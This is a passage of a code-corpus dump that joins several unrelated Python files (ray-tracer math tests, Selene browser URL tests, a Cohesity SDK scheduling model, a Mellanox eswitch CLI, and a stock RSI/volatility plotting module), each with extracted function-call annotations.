'self.dT_in_seconds', 'self.optimization_type'], {}), '(self.id, self.solver_name, self.model_path, self.\n control_frequency, self.repetition, output_config, input_config_parser,\n config, self.horizon_in_steps, self.dT_in_seconds, self.optimization_type)\n', (10906, 11111), False, 'from optimization.controllerMpc import OptControllerMPC\n'), ((13728, 13744), 'time.sleep', 'time.sleep', (['"""60"""'], {}), "('60')\n", (13738, 13744), False, 'import time\n'), ((4037, 4048), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4046, 4048), False, 'import os\n'), ((4133, 4153), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (4147, 4153), False, 'import os\n'), ((4608, 4619), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4617, 4619), False, 'import os\n'), ((4703, 4723), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (4717, 4723), False, 'import os\n'), ((5291, 5302), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5300, 5302), False, 'import os\n'), ((5386, 5406), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5400, 5406), False, 'import os\n'), ((11297, 11523), 'optimization.controllerDiscrete.OptControllerDiscrete', 'OptControllerDiscrete', (['self.id', 'self.solver_name', 'self.model_path', 'self.control_frequency', 'self.repetition', 'output_config', 'input_config_parser', 'config', 'self.horizon_in_steps', 'self.dT_in_seconds', 'self.optimization_type'], {}), '(self.id, self.solver_name, self.model_path, self.\n control_frequency, self.repetition, output_config, input_config_parser,\n config, self.horizon_in_steps, self.dT_in_seconds, self.optimization_type)\n', (11318, 11523), False, 'from optimization.controllerDiscrete import OptControllerDiscrete\n'), ((7207, 7396), 'json.dumps', 'json.dumps', (["{'control_frequency': self.control_frequency, 'horizon_in_steps': self.\n 
horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds': self.\n dT_in_seconds, 'type': 'load'}"], {}), "({'control_frequency': self.control_frequency, 'horizon_in_steps':\n self.horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds':\n self.dT_in_seconds, 'type': 'load'})\n", (7217, 7396), False, 'import json\n'), ((7674, 7841), 'prediction.prediction.Prediction', 'Prediction', (['config', 'self.control_frequency', 'self.horizon_in_steps', 'prediction_name', 'topic_param', 'self.dT_in_seconds', 'self.id', 'output_config', '"""load"""', 'opt_values'], {}), "(config, self.control_frequency, self.horizon_in_steps,\n prediction_name, topic_param, self.dT_in_seconds, self.id,\n output_config, 'load', opt_values)\n", (7684, 7841), False, 'from prediction.prediction import Prediction\n'), ((8655, 8842), 'json.dumps', 'json.dumps', (["{'control_frequency': self.control_frequency, 'horizon_in_steps': self.\n horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds': self.\n dT_in_seconds, 'type': 'pv'}"], {}), "({'control_frequency': self.control_frequency, 'horizon_in_steps':\n self.horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds':\n self.dT_in_seconds, 'type': 'pv'})\n", (8665, 8842), False, 'import json\n'), ((9114, 9276), 'prediction.prediction.Prediction', 'Prediction', (['config', 'self.control_frequency', 'self.horizon_in_steps', 'pv_lstm_name', 'topic_param', 'self.dT_in_seconds', 'self.id', 'output_config', '"""pv"""', 'opt_values'], {}), "(config, self.control_frequency, self.horizon_in_steps,\n pv_lstm_name, topic_param, self.dT_in_seconds, self.id, output_config,\n 'pv', opt_values)\n", (9124, 9276), False, 'from prediction.prediction import Prediction\n'), ((10014, 10176), 'prediction.pvPrediction.PVPrediction', 'PVPrediction', (['config', 'output_config', 'input_config_parser', 'self.id', 'self.control_frequency', 'self.horizon_in_steps', 'self.dT_in_seconds', 'non_prediction_name'], {}), '(config, output_config, input_config_parser, self.id, self.\n control_frequency, self.horizon_in_steps, self.dT_in_seconds,\n non_prediction_name)\n', (10026, 10176), False, 'from prediction.pvPrediction import PVPrediction\n'), ((11726, 11975), 'optimization.controllerStochasticTestMulti.OptControllerStochastic', 'OptControllerStochastic', (['self.id', 'self.solver_name', 'self.model_path', 'self.control_frequency', 'self.repetition', 'output_config', 'input_config_parser', 'config', 'self.horizon_in_steps', 'self.dT_in_seconds', 'self.optimization_type', 'self.single_ev'], {}), '(self.id, self.solver_name, self.model_path, self.\n control_frequency, self.repetition, output_config, input_config_parser,\n config, self.horizon_in_steps, self.dT_in_seconds, self.\n optimization_type, self.single_ev)\n', (11749, 11975), False, 'from optimization.controllerStochasticTestMulti import OptControllerStochastic\n')] |
xann16/py-path-tracing | ptrace/oop/math_tests.py | 609dbe6b80580212bd9d8e93afb6902091040d7a | """Unit tests for math-oriented common classes."""
import unittest
import math
import numpy as np
from .vector import Vec3, OrthonormalBasis
from .raycast_base import Ray
from .camera import Camera
class Vec3Tests(unittest.TestCase):
"""Test for Vec3 class."""
def test_vec3_basic(self):
"""Basic creation, access and manipulation of vector components."""
zero = Vec3()
vvv = Vec3(1, 2, 3)
x_arr = np.array([.1, .2, .3], dtype='double')
xxx = Vec3.from_array(x_arr)
ones = Vec3.full(1.0)
i_hat = Vec3.versor(0)
self.assertEqual(zero[0], 0.0)
self.assertEqual(zero[1], 0.0)
self.assertEqual(zero[2], 0.0)
self.assertEqual(vvv[0], 1.0)
self.assertEqual(vvv[1], 2.0)
self.assertEqual(vvv[2], 3.0)
vvv[2] = 10
self.assertEqual(vvv[2], 10.0)
self.assertEqual(str(vvv), '[ 1. 2. 10.]')
self.assertEqual(xxx[0], .1)
self.assertEqual(xxx[1], .2)
self.assertEqual(xxx[2], .3)
self.assertEqual(ones[0], 1)
self.assertEqual(ones[1], 1)
self.assertEqual(ones[2], 1)
self.assertEqual(i_hat[0], 1)
self.assertEqual(i_hat[1], 0)
self.assertEqual(i_hat[2], 0)
is_v_eq = np.allclose(vvv.data(), np.array([1, 2, 10]))
self.assertEqual(is_v_eq, True)
is_x_eq = np.allclose(xxx.data(), x_arr)
self.assertEqual(is_x_eq, True)
self.assertEqual(vvv.copy(), vvv)
def test_vec3_arithmetic_and_comparisons(self):
"""Testing methods and operators used for arithmentic and comparisons.
"""
xxx = Vec3(1, 2, 3)
yyy = Vec3(1, 2, 3)
zzz = Vec3(1, 0, -1)
self.assertEqual(xxx == yyy, True)
self.assertEqual(xxx != yyy, False)
self.assertEqual(xxx != zzz, True)
self.assertEqual(xxx == zzz, False)
self.assertEqual(yyy != zzz, True)
self.assertEqual(yyy == zzz, False)
yyy += zzz
self.assertEqual(yyy, Vec3.full(2))
self.assertEqual(yyy + xxx, Vec3(3, 4, 5))
yyy -= zzz
self.assertEqual(yyy, xxx)
self.assertEqual(yyy - xxx, Vec3())
self.assertEqual(+xxx, xxx)
self.assertEqual(-xxx, Vec3(-1, -2, -3))
yyy *= -1
self.assertEqual(yyy, -xxx)
self.assertEqual(yyy * -1.0, xxx)
zzz /= 2
self.assertEqual(zzz, Vec3(.5, 0, -.5))
self.assertEqual(zzz / 2, Vec3(.25, 0, -.25))
vvv = Vec3(3, 1, -2)
vvv *= Vec3(2, .5, -1)
self.assertEqual(vvv, Vec3(6, .5, 2))
self.assertEqual(vvv * Vec3.full(2), Vec3(12, 1, 4))
www = Vec3.full(10)
www /= Vec3(10, 5, 2)
self.assertEqual(www, Vec3(1, 2, 5))
self.assertEqual(www / 2, Vec3(.5, 1, 2.5))
self.assertAlmostEqual(www.dot(Vec3()), 0)
self.assertAlmostEqual(Vec3(1, 2, 4).dot(Vec3(1, -2, 1)), 1)
self.assertEqual(Vec3.versor(0).cross(Vec3.versor(1)), Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(2)), Vec3.versor(0))
self.assertEqual(Vec3.versor(2).cross(Vec3.versor(0)), Vec3.versor(1))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(0)), -Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(1)), Vec3())
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2, 3)), True)
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2.0001, 3), 0.1), True)
def test_vec3_normalization(self):
"""Testing length calculations and normalisation."""
self.assertAlmostEqual(Vec3().sqr_length(), 0.0)
self.assertAlmostEqual(Vec3().length(), 0.0)
self.assertAlmostEqual(Vec3.versor(0).sqr_length(), 1.0)
self.assertAlmostEqual(Vec3.versor(1).length(), 1.0)
self.assertAlmostEqual(abs(Vec3.versor(2)), 1.0)
self.assertEqual(Vec3.versor(0).normalised(), Vec3.versor(0))
self.assertEqual(Vec3.versor(1).normalised(), Vec3.versor(1))
self.assertEqual(Vec3.versor(2).normalised(), Vec3.versor(2))
sqrt3 = math.sqrt(3)
v_sqrt3_inv = Vec3.full(1. / sqrt3)
self.assertAlmostEqual(Vec3.full(1).sqr_length(), 3)
self.assertAlmostEqual(Vec3.full(1).length(), sqrt3)
self.assertEqual(Vec3.full(1).normalised(), v_sqrt3_inv)
def test_vec3_reflection(self):
"""Testing reflection with respect to given normal vector."""
nnn = Vec3.versor(2)
self.assertEqual(nnn.reflect(Vec3.versor(0)), Vec3.versor(0))
self.assertEqual(nnn.reflect(Vec3.versor(2)), -Vec3.versor(2))
diag = Vec3(1, 1, 1).normalised()
diag_refl = diag.copy()
diag_refl[2] = -diag_refl[2]
self.assertEqual(nnn.reflect(diag), diag_refl)
class OrthonormalBasisTests(unittest.TestCase):
"""Tests for OrthonormalBasis class."""
def test_onb_basic(self):
"""Basic test reconstructing natural ONB."""
nat = OrthonormalBasis(Vec3.versor(0), Vec3.versor(1), Vec3.versor(2))
nat_alt = OrthonormalBasis.from_two('xy', Vec3.versor(0), Vec3.versor(1))
vvv = Vec3(1, 2, 3)
self.assertEqual(nat.transform(vvv), vvv)
self.assertEqual(nat_alt.transform(vvv), vvv)
def test_onb_factories(self):
"""Testing factory methods for creating ONBs from one or two vectors."""
onb1 = OrthonormalBasis.from_two('xy', Vec3(1, 2, 4).normalised(),\
Vec3(0, 0, -7).normalised())
self.assertAlmostEqual(abs(onb1.x_axis), 1.0)
self.assertAlmostEqual(abs(onb1.y_axis), 1.0)
self.assertAlmostEqual(abs(onb1.z_axis), 1.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.y_axis), 0.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.z_axis), 0.0)
self.assertAlmostEqual(onb1.y_axis.dot(onb1.z_axis), 0.0)
onb2 = OrthonormalBasis.from_two('zx', Vec3(-1, -1, -1).normalised(),\
Vec3(1, 1, -1).normalised())
self.assertAlmostEqual(abs(onb2.x_axis), 1.0)
self.assertAlmostEqual(abs(onb2.y_axis), 1.0)
self.assertAlmostEqual(abs(onb2.z_axis), 1.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.y_axis), 0.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.z_axis), 0.0)
self.assertAlmostEqual(onb2.y_axis.dot(onb2.z_axis), 0.0)
onb3 = OrthonormalBasis.from_z_axis(Vec3.versor(0))
self.assertAlmostEqual(abs(onb3.x_axis), 1.0)
self.assertAlmostEqual(abs(onb3.y_axis), 1.0)
self.assertAlmostEqual(abs(onb3.z_axis), 1.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.y_axis), 0.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.z_axis), 0.0)
self.assertAlmostEqual(onb3.y_axis.dot(onb3.z_axis), 0.0)
class RayTests(unittest.TestCase):
"""Tests for Ray class."""
def test_ray_basic(self):
"""Basic tests chcecking ray creation and probing their points."""
ox_axis = Ray(Vec3(), Vec3.versor(0))
self.assertEqual(ox_axis.point_at(4), Vec3(4, 0, 0))
direction = Vec3(1, -1, 0).normalised()
ray1 = Ray(Vec3(0, 2, 0), direction)
ray2 = Ray.from_points(Vec3(0, 2, 0), Vec3(2, 0, 0))
self.assertEqual(ray1.direction, direction)
self.assertEqual(ray2.direction, direction)
for i in range(10):
self.assertEqual(ray1.point_at(i), ray2.point_at(i))
self.assertEqual(ray1.point_at(0), ray1.origin)
self.assertEqual(ray2.point_at(0), ray2.origin)
class CameraTests(unittest.TestCase):
"""Tests for Camera class."""
def test_cam_basic(self):
"""Basic test checking if camera casts rays in correct direction."""
cam = Camera(Vec3(), Vec3.versor(0), Vec3.versor(2), 10, 10, 120)
cam.set_focus(Vec3.versor(0), 1.0)
for px_x in range(10):
for px_y in range(10):
ray = cam.get_ray(px_x, px_y)
self.assertGreaterEqual(ray.direction.dot(Vec3.versor(0)), 0.0)
if __name__ == '__main__':
unittest.main()
| [((8125, 8140), 'unittest.main', 'unittest.main', ([], {}), '()\n', (8138, 8140), False, 'import unittest\n'), ((443, 484), 'numpy.array', 'np.array', (['[0.1, 0.2, 0.3]'], {'dtype': '"""double"""'}), "([0.1, 0.2, 0.3], dtype='double')\n", (451, 484), True, 'import numpy as np\n'), ((4121, 4133), 'math.sqrt', 'math.sqrt', (['(3)'], {}), '(3)\n', (4130, 4133), False, 'import math\n'), ((1309, 1329), 'numpy.array', 'np.array', (['[1, 2, 10]'], {}), '([1, 2, 10])\n', (1317, 1329), True, 'import numpy as np\n')] |
kianku/selene | tests/integration/condition__browser__have_url_test.py | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | # MIT License
#
# Copyright (c) 2015-2020 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| [((1424, 1468), 'selene.have.url', 'have.url', (['session_browser.driver.current_url'], {}), '(session_browser.driver.current_url)\n', (1432, 1468), False, 'from selene import have\n'), ((1497, 1549), 'selene.have.no.url', 'have.no.url', (['session_browser.driver.current_url[:-1]'], {}), '(session_browser.driver.current_url[:-1])\n', (1508, 1549), False, 'from selene import have\n'), ((1664, 1702), 'selene.have.url_containing', 'have.url_containing', (['"""start_page.html"""'], {}), "('start_page.html')\n", (1683, 1702), False, 'from selene import have\n'), ((1731, 1773), 'selene.have.no.url_containing', 'have.no.url_containing', (['"""start_page.xhtml"""'], {}), "('start_page.xhtml')\n", (1753, 1773), False, 'from selene import have\n'), ((1939, 1970), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (1952, 1970), False, 'import pytest\n'), ((2215, 2246), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (2228, 2246), False, 'import pytest\n'), ((1261, 1286), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1276, 1286), False, 'import os\n'), ((1995, 2013), 'selene.have.url', 'have.url', (['"""xttp:/"""'], {}), "('xttp:/')\n", (2003, 2013), False, 'from selene import have\n'), ((2271, 2300), 'selene.have.url_containing', 'have.url_containing', (['"""xttp:/"""'], {}), "('xttp:/')\n", (2290, 2300), False, 'from selene import have\n')] |
chandrashekar-cohesity/management-sdk-python | cohesity_management_sdk/models/scheduling_policy.py | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule)
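# Illustrative sketch, not part of the original module: how the camelCase keys
# in _names map onto the model when deserializing. 'kDaily' is one of the
# documented periodicity values; the nested schedule keys are simply omitted here.
#
#   policy = SchedulingPolicy.from_dictionary({'periodicity': 'kDaily'})
#   policy.periodicity       # 'kDaily'
#   policy.daily_schedule    # None, because 'dailySchedule' was not supplied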
| [] |
mail2nsrajesh/networking-mlnx | networking_mlnx/eswitchd/cli/ebrctl.py | 9051eac0c2bc6abf3c8790e01917e405dc479922 | #!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
    The actions supported through the CLI are:
    write-sys, del-port, allocate-port and add-port.
    Each action is matched with the method that handles it,
    e.g. the write-sys action is handled by the write_sys method.
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
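# Illustrative command lines, not part of the original module, derived from the
# argparse definitions above; the angle-bracket values are placeholders:
#
#   ebrctl allocate-port <vnic_mac> <device_id> <fabric> <vnic_type>
#   ebrctl add-port <vnic_mac> <device_id> <fabric> <vnic_type> <dev_name>
#   ebrctl del-port <fabric> <vnic_mac>
#   ebrctl write-sys <path> <value>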
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| [((752, 773), 'networking_mlnx.eswitchd.cli.conn_utils.ConnUtil', 'conn_utils.ConnUtil', ([], {}), '()\n', (771, 773), False, 'from networking_mlnx.eswitchd.cli import conn_utils\n'), ((1098, 1136), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""ebrctl"""'}), "(prog='ebrctl')\n", (1121, 1136), False, 'import argparse\n'), ((1213, 1252), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'add_help': '(False)'}), '(add_help=False)\n', (1236, 1252), False, 'import argparse\n'), ((2627, 2648), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (2643, 2648), False, 'import sys\n'), ((2653, 2664), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2661, 2664), False, 'import sys\n'), ((2987, 3008), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (3003, 3008), False, 'import sys\n'), ((3013, 3024), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3021, 3024), False, 'import sys\n'), ((3269, 3280), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3277, 3280), False, 'import sys\n'), ((3537, 3548), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3545, 3548), False, 'import sys\n'), ((2521, 2566), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in allocate command"""'], {}), "('Error in allocate command')\n", (2537, 2566), False, 'import sys\n'), ((2575, 2602), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2591, 2602), False, 'import sys\n'), ((2611, 2622), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2619, 2622), False, 'import sys\n'), ((2881, 2926), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in add-port command"""'], {}), "('Error in add-port command')\n", (2897, 2926), False, 'import sys\n'), ((2935, 2962), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2951, 2962), False, 'import sys\n'), ((2971, 2982), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2979, 2982), False, 'import sys\n'), ((3163, 3208), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in del-port command"""'], {}), "('Error in del-port command')\n", (3179, 3208), False, 'import sys\n'), ((3217, 3244), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3233, 3244), False, 'import sys\n'), ((3253, 3264), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3261, 3264), False, 'import sys\n'), ((3430, 3476), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in write-sys command"""'], {}), "('Error in write-sys command')\n", (3446, 3476), False, 'import sys\n'), ((3485, 3512), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3501, 3512), False, 'import sys\n'), ((3521, 3532), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3529, 3532), False, 'import sys\n')] |
paskino/SuRVoS | survos/core/__init__.py | e01e784442e2e9f724826cdb70f3a50c034c6455 |
from .launcher import Launcher
from .model import DataModel
from .layers import LayerManager
from .labels import LabelManager
from .singleton import Singleton
| [] |
Chahat-M/FinanceLib | src/FinanceLib/analysis.py | 0428779220a97e7fe0ad35a50207b737059b9c86 | from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
    Calculates and visualises the Relative Strength Index (RSI) for a company's stock.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
    ticker: pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    delta: pd.Series = ticker['Close'].diff()
    up: pd.Series = delta.clip(lower=0)
    down: pd.Series = -1 * delta.clip(upper=0)
    ema_up: pd.Series = up.ewm(com=13, adjust=False).mean()
    ema_down: pd.Series = down.ewm(com=13, adjust=False).mean()
    rs: pd.Series = ema_up / ema_down
    ticker['RSI'] = 100 - (100 / (1 + rs))
    ticker = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
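# Worked example of the RSI formula above (illustrative numbers only): with
# ema_up = 2.0 and ema_down = 1.0, rs = 2.0 and RSI = 100 - 100 / (1 + 2.0) = 66.67 (rounded).
# The 30/70 lines plotted above mark the usual oversold/overbought thresholds.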
def volatility(symbol :str, date :str) ->None:
"""
    Measures and visualizes the volatility of a stock by calculating the Average True Range (ATR).
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
    data: pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    data.head()
    high_low: pd.Series = data['High'] - data['Low']
    high_cp: pd.Series = np.abs(data['High'] - data['Close'].shift())
    low_cp: pd.Series = np.abs(data['Low'] - data['Close'].shift())
    df: pd.DataFrame = pd.concat([high_low, high_cp, low_cp], axis=1)
    true_range: pd.Series = np.max(df, axis=1)
    average_true_range: pd.Series = true_range.rolling(14).mean()
    # equivalent rolling-sum form: true_range.rolling(14).sum() / 14
    fig, ax = plt.subplots()
    average_true_range.plot(ax=ax)
    ax2 = data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | [((620, 652), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (638, 652), True, 'import pandas_datareader as pdr\n'), ((1072, 1087), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {}), '(2)\n', (1084, 1087), True, 'import matplotlib.pyplot as plt\n'), ((1394, 1404), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1402, 1404), True, 'import matplotlib.pyplot as plt\n'), ((1865, 1897), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (1883, 1897), True, 'import pandas_datareader as pdr\n'), ((2137, 2183), 'pandas.concat', 'pd.concat', (['[high_low, high_cp, low_cp]'], {'axis': '(1)'}), '([high_low, high_cp, low_cp], axis=1)\n', (2146, 2183), True, 'import pandas as pd\n'), ((2208, 2226), 'numpy.max', 'np.max', (['df'], {'axis': '(1)'}), '(df, axis=1)\n', (2214, 2226), True, 'import numpy as np\n'), ((2367, 2381), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), 